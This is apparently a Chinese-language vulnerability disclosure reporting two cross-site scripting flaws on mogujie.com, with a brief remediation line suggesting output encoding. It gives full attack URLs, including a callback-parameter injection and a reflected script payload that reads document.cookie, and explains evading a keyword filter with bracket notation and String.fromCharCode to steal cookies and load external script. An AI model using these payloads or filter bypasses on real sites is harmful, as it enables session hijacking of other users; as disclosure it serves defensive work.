先来重点的:首先是一个dom型xss,url参数输出在js里面。原始url在http://www.mogujie.com/upload/addpic?callback=parent;prompt(/test/);//&code=3002
刚开始弹窗很容易,可是剑心告诉我们缺乏可以影响他人帐号或数据的证明案例,于是要进一步利用。
果然弹document.cookie就弹不出来了
原来是被卡擦掉了,更换大小写也不行。包括document.write document.body.append都被卡擦掉了。
但是妹纸还是要跨的,怎么绕?用object.func 等同于object["func"],
于是有document.cookie === document[String.fromCharCode(99,111,111,107,105,101)]
成功pia出。
然后构造payload时用document[String.fromCharCode(119,114,105,116,101)] 代替 document.write。
这个网页木有body,所以调用document.body.append会null object... 还是用document.append。
调用外部js效果如下
——————————————
另外一个就是平常的反射xss了,直接弹cookie,木有过滤
http://www.mogujie.com/magic/brand/1qi?keyword=1%3C%2ftitle%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E
修复方案: 输出的时候encode一下?
查看更多关于蘑菇街xss两枚,绕过滤拿妹纸cookie - 网站安全的详细内容...